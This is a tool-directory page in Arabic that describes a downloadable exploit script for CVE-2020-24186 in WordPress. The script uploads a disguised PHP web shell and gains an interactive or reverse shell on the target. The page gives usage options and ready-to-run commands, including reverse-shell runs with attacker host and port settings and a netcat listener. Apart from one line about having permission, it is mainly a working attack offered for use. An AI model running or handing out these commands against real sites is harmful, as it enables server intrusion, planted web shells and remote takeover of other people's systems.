Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/gazettel/cve-2020-24186
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubgazettel/cve-2020-24186

CVE-2020-24186

نص استغلال لـ CVE-2020-24186 في ووردبريس يقوم برفع غلاف ويب PHP مموه ويوفر وصولاً تفاعليًا أو شل عكسي مع أتمتة مستمع pwntools اختيارية.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-24186

يستغل هذا السكريبت الثغرة CVE-2020-24186 في ووردبريس لرفع حمولة PHP مقنعة والحصول على شل على النظام المستهدف. هناك ثلاثة أوضاع تشغيل:

  1. شل تفاعلي:
    يقوم برفع الويب شل الأساسي ويدخل في وضع تفاعلي يسمح لك بإرسال الأوامر عبر باراميتر cmd.

  2. شل عكسي يدوي:
    يقوم برفع الويب شل وإرسال حمولة الشل العكسي، لكنه لا يقوم بتشغيل مستمع تلقائياً. يجب عليك بدء المستمع الخاص بك يدوياً على عنوان IP والمنفذ المحددين.

  3. شل عكسي باستخدام pwntools:
    يقوم برفع الويب شل وإرسال حمولة الشل العكسي، ويقوم السكريبت تلقائياً بتشغيل مستمع باستخدام pwntools لالتقاط الاتصال العكسي.

المتطلبات

  • Python 3.x
  • مكتبات بايثون:
    • requests
    • pwn (pwntools)
  • (اختياري) إعداد بروكسي إذا كنت تريد توجيه الحركة المرورية (على سبيل المثال، للاختبار باستخدام Burp Suite).

خيارات الاستخدام

  • --url: عنوان URL الأساسي للموقع المستهدف (مثل http://10.10.110.119).
  • --blogpath: مسار المنشور (الافتراضي: /?page=1).
  • --mode: وضع التشغيل، إما interactive أو reverse.
  • --lhost: عنوان IP المحلي للشل العكسي (مطلوب في الوضع العكسي).
  • --lport: المنفذ المحلي للشل العكسي (مطلوب في الوضع العكسي).
  • --reverse_method: طريقة الشل العكسي: bash أو nc أو python (الافتراضي هو bash).
  • --manual: عند استخدامه في الوضع العكسي، لن يقوم السكريبت بتشغيل المستمع؛ يجب أن تبدأ المستمع الخاص بك يدوياً.
  • --use-proxy: إذا تم تعيينه، سيتم إرسال الطلبات عبر البروكسي المُهيأ.

أمثلة

1. شل تفاعلي

قم برفع ويب شل وابدأ جلسة تفاعلية لإرسال الأوامر:

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode interactive --use-proxy

2. شل عكسي في الوضع اليدوي

قم برفع ويب شل، وأرسل حمولة الشل العكسي، لكن لا تبدأ المستمع تلقائياً. ابدأ المستمع الخاص بك يدوياً (على سبيل المثال، باستخدام netcat):

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --manual --use-proxy

ثم، في طرفية أخرى، ابدأ المستمع الخاص بك يدوياً:

root@kitploit:~
nc -lvnp 9002

1. شل عكسي باستخدام pwntools

قم برفع ويب شل، وأرسل حمولة الشل العكسي، واجعل السكريبت يقوم تلقائياً بتشغيل مستمع باستخدام pwntools لالتقاط الاتصال:

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --use-proxy

سينتظر السكريبت اتصالاً على 10.10.1.1:9002، وبمجرد الاتصال، سيوفر شلاً تفاعلياً.

ملاحظات تأكد من أن الموقع المستهدف معرض للثغرة CVE-2020-24186 وأن لديك الأذونات اللازمة لاختبار الأمان. يمكنك تعديل حمولة PHP باستخدام الخيار --php_payload إذا كانت هناك حاجة للتعديلات. تحقق جيداً من إعدادات البروكسي إذا استخدمت العلم --use-proxy.

تنزيل الأداة